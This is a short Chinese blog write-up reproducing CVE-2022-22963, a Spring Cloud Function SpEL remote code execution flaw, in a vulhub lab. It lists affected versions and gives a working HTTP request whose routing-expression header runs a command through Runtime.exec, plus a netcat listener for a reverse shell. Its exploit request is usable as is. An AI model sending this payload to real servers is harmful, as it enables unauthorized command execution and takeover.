漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE

0x00 实验环境

攻击机:Ubuntu

靶场:vulhub搭建的靶场环境

 

0x01 影响版本

  • 3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6
  • Spring Cloud Function <= 3.2.2

不受影响版本

  • Spring Cloud Function 3.1.7
  • Spring Cloud Function 3.2.3

 

0x02 漏洞复现

(1)访问页面页面是这样:

(2)首先验证漏洞,直接刷新链接,然后抓包,然后发送post包:

POST /functionRouter HTTP/1.1
Host: xxx:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping xxx.xxx.xxx")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

 (3)直接反弹shell的命令:nc -lvp 端口

 

 

0x03 漏洞原理

 https://blog.csdn.net/qq_36869808/article/details/124164802

 

0x04 参考文献

https://blog.csdn.net/qq_36869808/article/details/124164802

 

0x05 免责声明

本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

相关文章

这篇文章主要介绍了spring的事务传播属性REQUIRED_NESTED的原...
今天小编给大家分享的是一文解析spring中事务的传播机制,相...
这篇文章主要介绍了SpringCloudAlibaba和SpringCloud有什么区...
本篇文章和大家了解一下SpringCloud整合XXL-Job的几个步骤。...
本篇文章和大家了解一下Spring延迟初始化会遇到什么问题。有...
这篇文章主要介绍了怎么使用Spring提供的不同缓存注解实现缓...